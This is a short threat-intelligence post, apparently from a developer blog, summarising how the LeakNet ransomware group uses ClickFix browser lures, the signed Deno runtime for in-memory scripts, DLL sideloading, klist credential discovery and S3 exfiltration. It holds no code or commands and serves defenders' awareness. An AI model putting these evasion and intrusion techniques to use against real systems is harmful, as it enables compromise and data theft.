LeakNet ransomware has evolved its tactics by adopting the ClickFix social engineering technique for initial access. This method tricks users into executing malicious commands through deceptive browser prompts. Once inside, the group utilizes a "Bring Your Own Runtime" (BYOR) strategy, deploying the legitimate, signed Deno runtime to execute malicious JavaScript and TypeScript directly in system memory.
By leveraging Deno, LeakNet minimizes its forensic footprint and bypasses traditional security filters that might flag custom loaders. Post-exploitation activities include host fingerprinting, DLL sideloading, and credential discovery via klist. The group maintains persistence through a polling loop and uses Amazon S3 buckets for data exfiltration, signaling a sophisticated shift toward stealthier, developer-tool-based attacks.
Top comments (0)